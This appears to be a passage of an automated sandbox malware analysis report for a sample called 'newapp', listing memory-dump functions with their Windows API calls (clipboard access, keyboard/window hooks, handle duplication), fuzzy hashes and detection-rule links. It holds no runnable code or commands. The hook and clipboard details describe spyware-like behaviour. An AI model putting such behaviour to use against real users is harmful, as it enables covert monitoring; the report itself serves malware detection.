OleGetClipboard.OLE32(?), ref: 0666C168

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 2ff9cdb9d2a7973ede4d7897ac55e78eb3e4cef168a5cd12463c7a794dd1cb29
Instruction ID: eccbbd3890d7c72080da8d516cd2482a969681e4e7490da5790dcc06830015a5
Opcode Fuzzy Hash: 2ff9cdb9d2a7973ede4d7897ac55e78eb3e4cef168a5cd12463c7a794dd1cb29
Instruction Fuzzy Hash: 4331F1B0E01608EFDB54DF9AD984BCEBBF5AF48304F248019E404AB390D774A945CF95

Function 0666A4E8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0666A577

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 82deec54695f95e93ae1ad7c912312a93d2e2ba2b08c9d4144471c9db6a3cfaa
Instruction ID: 95cab71f03d18b60b94aeb18ae721f77210d01069b2d1a3d60b07a25ef1dd253
Opcode Fuzzy Hash: 82deec54695f95e93ae1ad7c912312a93d2e2ba2b08c9d4144471c9db6a3cfaa
Instruction Fuzzy Hash: F821E3B5900258EFDB10CFAAD984ADEBFF8EB48310F14801AE954A3310C374A944CFA5

Function 0666A4F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0666A577

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 21bc2c7c12d11c690d7e274df027dab0d0063fad31efeaa3fbd3074016c0b516
Instruction ID: a292eab9b62832331eedeb7f26d8c660ccf15d6dc236f137698f43ddfd1990cb
Opcode Fuzzy Hash: 21bc2c7c12d11c690d7e274df027dab0d0063fad31efeaa3fbd3074016c0b516
Instruction Fuzzy Hash: 4721E4B5D00218DFDB10CF9AD984ADEBBF4FB48310F14801AE914A3310C374A944CFA4

Function 0666DEA0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0666DF23

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 199ea7d3412a1feb376bbc98b6fad7d53c88521d05186b07ba762ae52ba37717
Instruction ID: 71efed487377a5b52258f9cf131855a0c06e334c88d03ee7b45d3d749432ecbe
Opcode Fuzzy Hash: 199ea7d3412a1feb376bbc98b6fad7d53c88521d05186b07ba762ae52ba37717
Instruction Fuzzy Hash: 4F210FB5D002499FCB54CF9AD844BEEFBF5AF88324F10842AE459A7250CB74A944CFA5

Function 0666DEA8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0666DF23

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: f55dabfea6908cbf9ae9fd4f70b41922c317630ceab52088ffe6722faaa47dd5
Instruction ID: 67df3f31aa28458296d51b4acf6f982e223288dcae3645639109a100cc57d34a
Opcode Fuzzy Hash: f55dabfea6908cbf9ae9fd4f70b41922c317630ceab52088ffe6722faaa47dd5
Instruction Fuzzy Hash: EF2110B5D002498FCB54CF9AD844BEEFBF5AF88320F10842AE458A7250CB74A944CFA5

Function 066656A8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06665716

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 73fe381b8bc04d8f7e6917b278a5a34d96ac883352c446924a3ee41e637f9bb0
Instruction ID: a0cad242e3179fd4f7e36987211cbeefc1f40dc65d87ab847a2d2e7dab161c02
Opcode Fuzzy Hash: 73fe381b8bc04d8f7e6917b278a5a34d96ac883352c446924a3ee41e637f9bb0
Instruction Fuzzy Hash: 841134B5C00249CFCB20CF9AD845ADEFBF5AB89310F10842AE419B7310C375A545CFA5

Function 028CEF80 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 028CEFE7

Memory Dump Source

Source File: 0000000A.00000002.2925916993.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_28c0000_newapp.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 8cad126ba0a714cce8fead8a3e442573eb937195be97b494b680cfd587b20be4
Instruction ID: 0d7be1659cda669dcb3893ca429a1a3556d38e5ea786444a37dbef9c7cc6dde9
Opcode Fuzzy Hash: 8cad126ba0a714cce8fead8a3e442573eb937195be97b494b680cfd587b20be4
Instruction Fuzzy Hash: 151123B5C006699FCB10CF9AC544BDEFBF4BF48320F10816AE818A7240D378A944CFA5

Function 06663FFC Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06665716

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4755d5785f6006019687161d9263bdb205ce8ad7277d7d2a2cd94fc3cef0b769
Instruction ID: 2138fbf494b16dfa925d46c963416be452e0b543b5a6e8e46467e969bfd3560e
Opcode Fuzzy Hash: 4755d5785f6006019687161d9263bdb205ce8ad7277d7d2a2cd94fc3cef0b769
Instruction Fuzzy Hash: DF1102B5C00349CFDB10DF9AD449ADEFBF5EB88220F10846AE869B7610C375A545CFA5

Function 0666B4EC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0666BFED

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e72c01ca2969afafd80b7276f87249c60138048940778e4c61d77b6aa216484c
Instruction ID: 382d78e059518ada3244456ff807ed4faebc2b6522493d690b43957a81ea0772
Opcode Fuzzy Hash: e72c01ca2969afafd80b7276f87249c60138048940778e4c61d77b6aa216484c
Instruction Fuzzy Hash: E71142B4900348CFCB60DF9AE448BDEBBF4EB48320F20841AE558A7310C374A944CFA4

Function 0666B2B4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0666BAA5), ref: 0666BB2F

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 5b612c929785fafa9ad29b02ff28e3de6eee54edf322519dbdc060baf4f22085
Instruction ID: ff55c49ad7d1ffe4cccb44dde515eb61f59aff794295aae15354561e345517ac
Opcode Fuzzy Hash: 5b612c929785fafa9ad29b02ff28e3de6eee54edf322519dbdc060baf4f22085
Instruction Fuzzy Hash: 2911F2B5804248CFCB60DF9AD489B9EBBF4EB48324F208459E959A7250C774A944CFA5

Function 0666BAC8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0666BAA5), ref: 0666BB2F

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 61c5bbff76776d9dcb7f6da9038bc69cf754649e2381dc059f8b15810b123a82
Instruction ID: 59aa416bed28566be15086f5b96a4fb2319fdce92ad4f1331e10aa1ab95a49ef
Opcode Fuzzy Hash: 61c5bbff76776d9dcb7f6da9038bc69cf754649e2381dc059f8b15810b123a82
Instruction Fuzzy Hash: C61115B5800248CFCB10DF9AD985BDEFBF8EB48324F208419E559A7350C774A944CFA5

Function 0666BF91 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0666BFED

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: dae195e02092b5145bf9c8b625fc818ca3ff5bae554ec86d5760d34758b4fbef
Instruction ID: 2accd84c4e54665403f6078d3a6c6d3e20f46ebc808366d7d45313b3bfc42f54
Opcode Fuzzy Hash: dae195e02092b5145bf9c8b625fc818ca3ff5bae554ec86d5760d34758b4fbef
Instruction Fuzzy Hash: 3E1112B5900248CFCB20DF9AD548BDEBFF8EB48324F208459E558A7310C375A544CFA5

Function 0667DBAD Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0667DD09

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: bfea6a568ec120be331bd2c0422f964329fa9cf075a28c838dd94666ce1de6e5
Instruction ID: 06d590d22946e4599aa95c03c41d86b9a9b50d2e3e5176a275be9e65cce833cc
Opcode Fuzzy Hash: bfea6a568ec120be331bd2c0422f964329fa9cf075a28c838dd94666ce1de6e5
Instruction Fuzzy Hash: 1341A170E007099FDB55DFA5C95469EBBB6FF85300F204929E405E7340EBB1E946CB91

Function 066721D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06672313

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 7ab22774888960d0cf36dc39428c6cae46df5c2fbd94e6747d276fca37505033
Instruction ID: 95a75e98ed23eacb98744ab44bdc7bb1ff79b0c5cfb258e2793bef43f1c9b17c
Opcode Fuzzy Hash: 7ab22774888960d0cf36dc39428c6cae46df5c2fbd94e6747d276fca37505033
Instruction Fuzzy Hash: 3C31E030B002018FDB49AB74D52466F7BE6AFC9704F208438D406DB395EE39DE46CBA5

Function 06674B61 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Ocq, xrefs: 06674B6D

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: \Ocq
API String ID: 0-2995510325
Opcode ID: df2f523a1c8a3243579a0ab1ec0d2addc3237f4637794d1a6b138f65adf6b167
Instruction ID: ca1be279af60b3eb98e44e6ab0d9efb9d1b870161fd25a4a3917fb4ddc2b49dd
Opcode Fuzzy Hash: df2f523a1c8a3243579a0ab1ec0d2addc3237f4637794d1a6b138f65adf6b167
Instruction Fuzzy Hash: 44F0DA30A50119DBDB14DF94E899BAEBBB2FF88B00F204119E402A7394CB741D02CB90

Function 066762E0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18fe940dd28aebfe8d43192477af11dffe9004f727090848f91dbfd54178d539
Instruction ID: 87b0d3d894ab3ddbd0289467220074761bb30c6dbdc62dceea59a1bd2876aedf
Opcode Fuzzy Hash: 18fe940dd28aebfe8d43192477af11dffe9004f727090848f91dbfd54178d539
Instruction Fuzzy Hash: 9061C071F004114FCF549A7EC88466FAAD7AFC4624F15443AD80EDB364DE65ED0287D6

Function 066743A8 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 733e3697beada7310f4ae4b9f61f2cd1fb5831e97753119a6f61945e1e984a85
Instruction ID: 482d9bdf168dee8cb669938563ed986ecef8455e039abf47671407fd676b2637
Opcode Fuzzy Hash: 733e3697beada7310f4ae4b9f61f2cd1fb5831e97753119a6f61945e1e984a85
Instruction Fuzzy Hash: 1C813A30B002099FDB54DFA9D5547AEB7F2AB89304F248529D40AEB395EF34ED428B91

Function 066746C8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c9c0cb35f19805f8c479155f4e8a30f379f24691e3c88e2693f78c22c35f5a
Instruction ID: ee17e2a8a63502b8525d0de6bb50730307af1980b89adb8ca52b366b56de8b1a
Opcode Fuzzy Hash: 27c9c0cb35f19805f8c479155f4e8a30f379f24691e3c88e2693f78c22c35f5a
Instruction Fuzzy Hash: B4914E34E106198FDF60DF68C890B9DB7B1FF89310F208599D449AB395EB70AA85CF91

Function 066746E0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9dcb390e1c36c55d7d66b36c14bac20b5c0ae7fd323a5fbdb8f113278fd08fc
Instruction ID: 0ad4c5f6ce2d07a08b43c8b1e1acf16e101f82977cd71b0a226a6000ee7b97ef
Opcode Fuzzy Hash: a9dcb390e1c36c55d7d66b36c14bac20b5c0ae7fd323a5fbdb8f113278fd08fc
Instruction Fuzzy Hash: BC914D34E102198BDF60DF68C880B9DB7B1FF89310F208599D54DAB355EB70AA85CF91

Function 0667F010 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7c726f467318c3395cdc261310eaabefb3e09271d41e754aae0a707519e03f
Instruction ID: 78434b4d83c1d4e369d61f05aeb9aa1efff0490bcd8b0ae4a6c8723929f85774
Opcode Fuzzy Hash: 4e7c726f467318c3395cdc261310eaabefb3e09271d41e754aae0a707519e03f
Instruction Fuzzy Hash: 9F715C74A002089FDB54DFA9C990A9DBBF6FF88314F248429E419EB355DB30ED46CB51

Function 0667F020 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 327bd1c6700a6e32be9f4999586ecf52ccad0c7f757e2bf2a41bdd6d77a86d40
Instruction ID: 237c45c5a60695865574f65555396b0cce6dadf80734dc13fa8f61cf1d373275
Opcode Fuzzy Hash: 327bd1c6700a6e32be9f4999586ecf52ccad0c7f757e2bf2a41bdd6d77a86d40
Instruction Fuzzy Hash: E9714B74A002089FDB54EFA9C990A9DBBF6FF88304F248429E419EB355DB30ED46CB51

Function 0667FCA0 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed81bda3ed7990ccb695cee1ee067e3e6ee789d95e07f2521cdd6cce55da58f
Instruction ID: eb9309fa210fc162e33e0c34e7ab923ca939b66eb1358078dbc08fa18cb69883
Opcode Fuzzy Hash: fed81bda3ed7990ccb695cee1ee067e3e6ee789d95e07f2521cdd6cce55da58f
Instruction Fuzzy Hash: D851E231E00109EFDB64EB78E854AAEBBB2FF84315F208869E10AD7351DF359845CB95

Function 0667FA50 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88be94c281865f09ff0234854ffa298e4bab2760a783f5452a3aa50fc708a659
Instruction ID: d57282817caf0cfba806053ac8e06344655e37381796444139d0ac610f3bd33b
Opcode Fuzzy Hash: 88be94c281865f09ff0234854ffa298e4bab2760a783f5452a3aa50fc708a659
Instruction Fuzzy Hash: D051F930B102049FEF64666CC954F6F3A5ED789714F20493AE40AD77A9CE79CC8647A2

Function 0667FA60 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c8316c0269e809f7b454ee43ab36d9ab5bb3493cbc243487188ddcc41b7d1bc
Instruction ID: 4188e06b524fc1137d6d3c684441de9015792b30a18c1f15327f8629c7ba3167
Opcode Fuzzy Hash: 4c8316c0269e809f7b454ee43ab36d9ab5bb3493cbc243487188ddcc41b7d1bc
Instruction Fuzzy Hash: 6051F530B10204DFEF64666CD994F2F365ED789714F20483AE50AD37A9CE79CC8587A2

Function 06675522 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c93e7ca57115b4e13c735aeae20b4846d7890f0993827c7de50ee1a2c1f8c596
Instruction ID: 892b031eb460bdb753e58d53928ace8082341beda99ee21a87d7567e17a0c992
Opcode Fuzzy Hash: c93e7ca57115b4e13c735aeae20b4846d7890f0993827c7de50ee1a2c1f8c596
Instruction Fuzzy Hash: 07416D71E006098FDF70CEAAD880AAFFBF2EB95310F10496AE156D7650DB30E945CB91

Function 066756A0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a63912277f3edf0fed60eb6ef1823278617293d412d94406a74780f88e3a7dc
Instruction ID: 40b93cabfea1b3a3ddbe0930d982eeff91bcab03b8cfd72bf99cee5f4e0f7d64
Opcode Fuzzy Hash: 1a63912277f3edf0fed60eb6ef1823278617293d412d94406a74780f88e3a7dc
Instruction Fuzzy Hash: 5641F671E102159FDF608F69C4C06AEBBB1FB45320F6588A6D45ADB391CA34ED41CB91

Function 06672088 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd40a82e20a522f952d6033bf909ac8e8e8a4e7f898c57ea73ca12d062a6761d
Instruction ID: 9880725e479909b2457f8ad39bc11badcebb05007393a4e2576afeae109c99d1
Opcode Fuzzy Hash: bd40a82e20a522f952d6033bf909ac8e8e8a4e7f898c57ea73ca12d062a6761d
Instruction Fuzzy Hash: 33315D30E006099FCB59CFA4D8A469EB7B6FF89304F10C529E916EB354DB71AD42CB60

Function 0667DA61 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b09be21664e55f9f60b9e4bd96b44ae2b77a39da2c04fb04e76e4e3f83c08c0
Instruction ID: 2fdf2185be2dbe1fe591e93d53b9a9aaa7c2f1139be66e566362cfea024a187c
Opcode Fuzzy Hash: 2b09be21664e55f9f60b9e4bd96b44ae2b77a39da2c04fb04e76e4e3f83c08c0
Instruction Fuzzy Hash: 11319030E1070A9FDF65DFA9C98069EBBB6FF84314F144929E405AB354EB70E9468B90

Function 06672098 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b38b3d9f672d394e7bc8e4928df4d33cf311c90efc7c6e0986f3a5e3e844ce5
Instruction ID: 2a705a934b42a0f4f3f657ed1a934dd1231f726853880534f4fcfcec34e0547d
Opcode Fuzzy Hash: 5b38b3d9f672d394e7bc8e4928df4d33cf311c90efc7c6e0986f3a5e3e844ce5
Instruction Fuzzy Hash: 20315030E006099FCB59DFA4D96469EB7B6FF89304F108529E906EB354DB71AD42CB50

Function 06673FB0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5713c48b06069df305f91a21858506caf353f9371daf7effd38afde3832947f4
Instruction ID: 109cd95ba7cec6f12c57655ed0f907a41284a1c8391ad7908beb2dfe679c5273
Opcode Fuzzy Hash: 5713c48b06069df305f91a21858506caf353f9371daf7effd38afde3832947f4
Instruction Fuzzy Hash: E821AD75F002059FDB00CFB9D980AEEBBF5AB88714F148029E948E7385EB35D9028BD1

Function 06673FC0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ca9ca86b932c1eaebfd606087fc0a5aa371d69f0cf2d60e3e1a7df4bbd6a95
Instruction ID: 7ade72643302389c671f05341e88c5d614bbe545ad2fe1393a30a15960fd6f4d
Opcode Fuzzy Hash: 08ca9ca86b932c1eaebfd606087fc0a5aa371d69f0cf2d60e3e1a7df4bbd6a95
Instruction Fuzzy Hash: 2F219D75F002199FDB40DF79D980AAEBBF5EB88714F10802AE909E7394EB35D901CB95

Function 00D9D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2921671317.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d9d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fdbbadcbb01c5f30ff024a8f0259ae8bfe1ea3c82155ec1c8fa45a865fdbbc0
Instruction ID: 962e53f7ddc3617adb69298b7d928ac736596fa842a0975796241981b0a3fc8f
Opcode Fuzzy Hash: 3fdbbadcbb01c5f30ff024a8f0259ae8bfe1ea3c82155ec1c8fa45a865fdbbc0
Instruction Fuzzy Hash: 1D21F271604204DFDF14DF14D9C4B26BBA6FB84314F24C669E84D4B296C33AD846CA72

Function 00D9D005 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2921671317.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d9d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b985c1eebda45ffe57817a65c659df784228be320b61282435abed0668a635d3
Instruction ID: aed745690278a3477a9c7239a7813e66de5691a75e09802f6c817bf08f3d188c
Opcode Fuzzy Hash: b985c1eebda45ffe57817a65c659df784228be320b61282435abed0668a635d3
Instruction Fuzzy Hash: 05212C7550D3C09FCB07CB24D994711BF71AB46214F29C5EBD8898F2A7C23A985ACB62

Function 06673560 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace8820711f6484972ce8eba85aa8723e2cb88976e324c42f2cec1efa343885e
Instruction ID: cea17841ebc452ab3cfca0168e29d41da3b3d7a150b5d7ccadc04780e718d9e3
Opcode Fuzzy Hash: ace8820711f6484972ce8eba85aa8723e2cb88976e324c42f2cec1efa343885e
Instruction Fuzzy Hash: 6621F071E002189FCB649F78D8415DEBBF5EB89310F0084A9E00AFB344DA31DA42CBA5

Function 06674308 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ee14486137ed6821aeb5ecab2fe0ecf339dd67b467cbf531a08a2913d08c9e2
Instruction ID: 46431358a0aad1e3cf79be4f89bdbeca166d167b27b726ebcfb94752e9579a4f
Opcode Fuzzy Hash: 8ee14486137ed6821aeb5ecab2fe0ecf339dd67b467cbf531a08a2913d08c9e2
Instruction Fuzzy Hash: 1711E5317102011FDB64C62ED819BAFBBDADBC6B24F20442AE20DC7395DD15DC0243E2

Function 066740BF Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41bfab73515588343b0aa96fc4f9fe3f73045a1256fd578f1cd92682ea5d087e
